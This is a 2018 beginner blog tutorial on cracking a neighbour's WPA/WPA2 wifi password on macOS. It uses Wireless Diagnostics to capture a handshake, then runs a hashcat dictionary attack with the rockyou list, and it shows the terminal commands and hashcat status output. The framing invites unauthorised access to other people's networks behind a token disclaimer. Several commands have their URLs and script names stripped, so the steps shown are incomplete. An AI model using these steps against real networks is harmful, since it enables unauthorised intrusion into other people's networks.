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Crack Wifi Passwords the Easy Way! (OSX Version)

14th June 2018

DISCLAIMER: This article is for educational purposes only. This article should not be used for illegal activity. The author is not responsible for its use.

You are 18 and bored at your grandma's place, there is no source of entertainment, but you find out there is a sweet wifi spot at your neighbours. You have gone through a lot of wifi cracking articles/videos but the more you try, the more frustrated you get to have it working correctly. I feel ya! Here's where this article comes in handy.

Even though majority classify cracking wifi passwords for the professional's, but this article is also targeted towards beginners who have very little knowledge on computers. So, feel free to give it a shot!


  • You need to be familiar with the command line. Or at least, how to paste the commands on the terminal ;)
  • You are using a Mac (or running OSX)

My Setup

I am using a MacBook Pro (13-inch, 2017) running macOS High Sierra version 10.13.5. You can find yours by selecting the Apple icon on the menu bar (top left of your screen) and select About This Mac.

Preparing your work directory

Lets create a folder on Desktop where we want to place all our work files in. You can change to your desired directory if needed.

Open the terminal (Command + Space and type Terminal). Once open, run the following commands

# Make your work directory
$ cd ~/Desktop
$ mkdir my-wifi-cracking-work
$ cd my-wifi-cracking-work

The my-wifi-cracking-work folder is now visible on your desktop screen.

Lets Get Started!

Here's how we plan to accomplish it:

  • We first identifying the target network to crack
  • Attempt to capture a 4 way handshake with our target network
  • Finally, crack the network password!

Identifying the the target network

Luckily OSX comes with wireless diagnostic tools that help with scanning/sniffing/etc. To access it, click on the wifi icon on the the menu bar while holding down the option key.


A dropdown menu will appear. Click on Open Wireless Diagnostics ....

Wireless Diagnostics window appears now, but we will not use the one shown. Click on Window on the menu bar and select Scan.


Note down the target networks channel and width.

Here's an example of my target network:

Target Network - jahid
Channel - 4
Width - 40 MHz

Capturing 4-way handshake with your target network

With the Wireless Diagnostics window open, click on Window on the menu bar and select Sniffer. Here, select the channel and width found from the previous step and press Start. The tool automatically tries to capture a handshake with the desired network, no prompt will be shown though.

Wait for 2-3 mins (we assume that is the typical time for a handshake to occur) and then press Stop.

On pressing Stop, the pcap file will be created on /var/tmp folder.

Lets now move this file into our work folder.

# Lets note down the file that was created
$ ls -l /var/tmp

# Identify the pcap file that was created by checking the date and time of each file. For example, in my case, the file created is (null)_ch04_2018-06-14_17.30.13.pcap
$ cp /var/tmp/(null)_ch04_2018-06-14_17.30.13.pcap ~/Desktop/my-wifi-cracking-work/

We need to convert the .pcap file to .hccapx file by uploading it here. If the handshake was captured in the file, this start the download of the .hccapx file. If not, you will need to try a bit longer than earlier stated to generate this file.

Cracking the password

Download naive-hashcat and extract into the work directory.


git clone it.

$ git clone ~/Desktop/my-wifi-cracking-work/

Then ...

$ cd naive-hashcat

# Let the source files build
$ ./

# download the 134MB rockyou dictionary file
$ curl -L -o dicts/rockyou.txt

# Copy the .hccapx file downloaded previously cloned folder
$ cp ~/Downloads/<your file>.hccapx ~/Desktop/my-wifi-cracking-work/naive-hashcat/

# Start cracking ..
$ HASH_FILE=<your file>.hccapx POT_FILE=cracked.pot HASH_TYPE=2500 ./

The cracking will take sometime depending on your hardware. To check your progress, you can press s where it would display an output similar to this:

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: jahid (AP:00:b0:c6:63:63:11 STA:34:8a:7b:8b:96:d0)
Time.Started.....: Fri Jun 15 23:34:49 2018 (3 secs)
Time.Estimated...: Fri Jun 15 23:54:29 2018 (19 mins, 37 secs)
Guess.Base.......: File (dicts/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:    12058 H/s (7.43ms) @ Accel:8 Loops:4 Thr:256 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 145930/14344384 (1.02%)
Rejected.........: 145930/145930 (100.00%)
Restore.Point....: 0/14344384 (0.00%)
Candidates.#2....: 123456789 -> getpaid1

Once done, the results will be storied in cracked.pot file. It will be in a format will be network name and password seperated by :


In this case the password is veryhardpassword123.


This article was inspired by the work of @brannondorsey and Lewis Encarnacion's awesome tutorial. Source.